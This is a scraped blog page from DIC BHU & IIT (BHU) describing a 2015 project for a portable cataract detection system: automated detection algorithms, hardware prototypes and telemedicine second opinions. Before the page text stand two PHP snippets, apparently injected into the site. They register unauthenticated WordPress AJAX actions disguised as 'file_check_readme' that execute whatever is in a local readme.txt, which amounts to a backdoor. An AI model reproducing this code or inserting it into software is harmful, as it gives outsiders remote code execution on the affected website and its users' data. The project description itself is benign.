if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Development of portable cataract detection system

27

Oct

Development of portable cataract detection system

  • Project Start Date

    27/10/2015

  • Timeline

    6 month

Brief Description of Project
  • To develop automated accurate cataract detection algorithms using digital eye images.
  • To implement the cataract detection algorithms on hardware having processing and transmission capability.
  • To augment the telemedicine facility of obtaining the second diagnostic opinion from medical experts.

 

Deliverable

The accurate algorithm for automated cataract detection.

A portable prototype of cataract detection system with network communication capability.